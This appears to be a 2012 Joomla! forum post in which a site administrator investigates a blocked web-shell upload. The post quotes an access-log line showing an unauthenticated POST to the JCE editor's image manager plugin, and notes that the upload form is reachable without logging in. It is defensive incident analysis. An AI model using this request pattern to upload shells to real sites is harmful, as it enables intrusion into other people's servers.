Story about JCE and hack attempt

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
ahmad
Joomla! Guru
Joomla! Guru

Story about JCE and hack attempt

Post by ahmad » Mon Aug 27, 2012 10:16 am

Greetings,

I am sharing what I've experienced today and the way I was thinking and analyzing so excuse me if it's a long post ...

I am on a dedicated machine protected by a firewall, proxy and a powerful enterprise anti-virus software. There's no access to the administration and no way for a user to login except through a VPN.

Today the anti-virus detected a 'php_rc57shell' malware. Quick research shown that this is another shell script being used to take control over the files/db ... etc. I checked the access logs and found a POST request matching the time when the anti-virus stopped the file:

Code: Select all

POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 10 "-" "BOT/0.1 (BOT for JCE)"
As shown it's calling com_jce and the imgmanager plugin. So, maybe a user tried to upload some malicious file? is it a hacking attempt? This is a pretty normal request present in everyday's log but :
  • 1- It wasn't in the regular working hours our users used to work.
    2- This was the first time this IP address visit the site!
I opened the browser and tried to access this URL directly. I am not logged in so I thought I will get an error or something. I was surprised because the page flashed for a second with the title saying 'Image Manager : 1.5.7.11' then it was redirected to the homepage! I viewed the source and found the image manager upload form waiting for an input.